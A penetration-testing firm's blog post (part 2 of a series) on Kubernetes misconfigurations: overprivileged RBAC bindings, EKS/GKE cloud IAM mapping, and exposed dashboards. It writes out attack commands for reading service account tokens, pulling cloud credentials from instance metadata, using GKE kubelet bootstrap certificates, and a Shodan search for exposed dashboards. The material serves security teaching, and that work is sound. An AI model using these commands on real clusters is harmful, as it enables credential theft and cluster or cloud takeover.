A Pentester’s Approach to Kubernetes Security — Part 2
This is the second part of a two-part blog series. Part 1 is available here — https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a
We will continue and conclude with some more misconfigurations that have led to exciting results during our pentesting engagements.
Vulnerabilities and Misconfigurations
The misconfigurations covered in this post arise from going overboard with privilege assignments, either due to overlapping permission sets or poor implementation knowledge, especially with cloud-managed clusters. Additionally, exposing unauthenticated management dashboards to the Internet is always a bad idea.
Permissions and Poor Privilege RBAC Management
Kubernetes RBAC is implemented by assigning permissions (verbs) as a group (roles/clusterroles) using an association (rolebindings/clusterrolebindings) to a user, group or service account.
Basically, a user or service account can be assigned a permission (or a set of permissions) via a role that is bound to it with a rolebinding. Roles and RoleBindings are limited to specific namespaces, whereas ClusterRoles and ClusterRoleBindings are cluster-wide.
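As a minimal sketch, assuming a namespace called dev and a service account called app-sa (both hypothetical names), a namespaced permission grant looks like this:
# Create a role that can only read pods in the dev namespace
kubectl create role pod-reader --verb=get,list,watch --resource=pods -n dev
# Bind it to a service account; the grant is limited to the dev namespace
kubectl create rolebinding pod-reader-binding --role=pod-reader --serviceaccount=dev:app-sa -n dev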
A common misconfiguration I come across is when overprivileged rolebindings and clusterrolebindings are assigned to arbitrary users, the default service accounts, or even worse to the system:anonymous account. Here’s an example of an overprivileged service account having cluster-admin access via the app-admin-deployer ClusterRoleBinding.
An attacker can use the ca.crt and token from here to become cluster administrator. These two values can also be accessed from a pod’s mounted file system via the /var/run/secrets/kubernetes.io/serviceaccount path.
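As a minimal sketch, assuming the API server address is known (shown here as a placeholder), the stolen credentials can be used like this:
# Inside a compromised pod: read the mounted service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Authenticate to the API server with the token and ca.crt, and list what this account can do
kubectl --server=https://<api-server>:6443 \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  --token="$TOKEN" \
  auth can-i --list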
To discover overprivileged service accounts or users, follow these steps (a sketch of the corresponding commands follows this list):
- List all clusterroles and, for each clusterrole, obtain the verbs assigned using -o json
- Identify any overprivileged clusterroles that can perform CRUD operations or carry the notorious “*” verb
- List all clusterrolebindings and look for clusterrolebindings that have a privileged clusterrole attached
- For each of these clusterrolebindings, use -o json and identify the service accounts and users listed under the subjects section
- For each subject across each problematic clusterrolebinding, evaluate where it is being used
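A minimal sketch of the first few steps, assuming jq is available and using cluster-admin as the privileged clusterrole of interest:
# Clusterroles whose rules include the wildcard "*" verb
kubectl get clusterroles -o json \
  | jq -r '.items[] | select([.rules[]?.verbs[]?] | index("*")) | .metadata.name'
# Clusterrolebindings that attach the cluster-admin clusterrole, with their subjects
kubectl get clusterrolebindings -o json \
  | jq '.items[] | select(.roleRef.name == "cluster-admin") | {binding: .metadata.name, subjects}'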
ClusterRoleBindings give privileges across the entire cluster and in most cases can be detected easily with tools; RoleBindings, however, are scoped to a single namespace and are not usually inspected by tools. They can still add up to cluster-wide permissions (imagine rolebindings in every namespace each granting admin privileges individually, which is effectively the same as cluster-wide admin). In such cases the attacker would work with a ca.crt and token for each namespace individually to mimic cluster-wide access.
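A quick way to spot this pattern, sketched here with the built-in admin and cluster-admin roles as the ones to look for:
# Rolebindings in every namespace that attach an admin-level role (adjust the role names of interest)
kubectl get rolebindings --all-namespaces -o json \
  | jq '.items[] | select(.roleRef.name == "admin" or .roleRef.name == "cluster-admin")
        | {namespace: .metadata.namespace, binding: .metadata.name, subjects}'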
Cloud IAM, K8S mapping and Cluster to Cloud Escape
Cloud-managed clusters like EKS and GKE implement an RBAC mapping layer between the cloud platform and Kubernetes so that any cloud IAM user provisioned to work with Kubernetes can be assigned appropriate roles within the cluster.
In AWS, for example, you can follow this guide to see how an AWS IAM user, who did not create the cluster, can be assigned a Kubernetes user role.
https://kloudle.com/academy/allowing-iam-users-to-access-aws-eks-using-kubectl/
Imagine a scenario where an AWS IAM user (let’s call this user eksadmin) exists who can create an EKS cluster but does not have access to other services like AWS S3 or IAM. If the role attached to the Cluster Node Group EC2 instances, AmazonEKSNodeRole in this case, is over-privileged as shown in the screenshot below, the eksadmin IAM user would be able to gain access to these other privileges via the nodes’ instance profile.
The eksadmin user can generate a kubeconfig file and use it to exec into a running pod. Once in the pod, the user can use the AWS CLI directly or generate privileged temporary credentials using the STS service via IMDS on the nodes. These credentials will have the same privileges as the AmazonEKSNodeRole IAM role, which in this case gives full access to IAM and S3 as well.
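A minimal sketch of this path, assuming a cluster named target-cluster and a pod named app-pod (both hypothetical names), and assuming the pod can reach the node’s IMDS:
# Generate a kubeconfig as the eksadmin IAM user and exec into a running pod
aws eks update-kubeconfig --name target-cluster --region us-east-1
kubectl exec -it app-pod -- sh
# Inside the pod: request temporary credentials for the node's IAM role from IMDS
# (if IMDSv2 is enforced, a session token must be requested first)
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"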
For GKE, the http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env endpoint contains the values for CA_CERT, KUBELET_CERT and KUBELET_KEY, which are the initial bootstrap credentials the kubelet uses when attaching the node to the GKE cluster.
These can be used to construct a kubeconfig YAML to access the cluster or used directly on the command line:
kubectl -s=https://cluster-server-ip \
--client-certificate=/path/to/kubelet.crt \
--client-key=/path/to/kubelet.key \
--certificate-authority=/path/to/ca.crt \
get nodes
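Retrieving the kube-env attribute itself is a single metadata request from the node (or from a pod that can reach the metadata service); the Metadata-Flavor header is required:
# Fetch kube-env and pull out the bootstrap credential values (a sketch)
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" \
  | grep -E "^(CA_CERT|KUBELET_CERT|KUBELET_KEY):"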
This, however, only works on GKE clusters that have Shielded Nodes disabled AND the legacy metadata endpoint enabled, both of which are non-default settings, making this attack rare in modern-day GKE clusters.
Additionally, the bootstrap credentials only carry CertificateSigningRequest (CSR) permissions, which need to be exploited further by generating crafted CSRs to escalate privileges.
For non-Shielded GKE nodes, you can use a tool like kubeletmein to automate CSR generation for a non-existent node and get a certificate back from the kube-controller-manager, which can then be used to construct a kubeconfig with higher privileges.
GKE generally presents a harder attack and exploitation experience thanks to its more modern defaults.
Exposed Cluster Administration Dashboards
The most common way of managing Kubernetes clusters is using the kubectl binary. Kubectl essentially makes HTTP and WebSocket requests to the Kubernetes API server. There are other UI products that can be used to interact with the control plane API, such as the Kubernetes Dashboard, Weave Scope, Lens, etc.
Usually, these management tools have authentication requirements, but in the worst cases these dashboards are accessible over the Internet without any authentication. A quick Shodan/Censys search will give you some very interesting results 😱
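As an illustration, a search along the following lines (a sketch using the Shodan CLI; the exact filter is an assumption) tends to surface exposed dashboards:
# Search for Internet-facing instances whose page title looks like the Kubernetes Dashboard
shodan search 'http.title:"Kubernetes Dashboard"'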
These are live results, so we recommend you do not interact with the clusters that you discover using Censys or Shodan.
An attacker can simply pick a target, run pods, bring down deployments, exec into running pods, ping sweep and port scan adjacent pods and compute instances, extract tokens and certificates, reach the instance metadata service endpoints, extract cloud environment variables and credentials, and escape to the cloud layer. The possibilities are limitless for an attacker.
Conclusion
This post covers common misconfigurations in Kubernetes clusters around permissions, privileges and RBAC, including misconfigurations that can be abused to escalate privileges and eventually escape to the cloud layer.
OSINT tools like Shodan and Censys can also be used to find misconfigured Kubernetes dashboards that allow for a complete takeover of the cluster, and potentially of the cloud platform as well via additional over-privileged role permissions.
PS: Our Kubernetes Penetration Testing as a Service offering can be used to run a real-world penetration test on your clusters to assess their security. Drop in a hello to riyaz@appsecco.com to know more!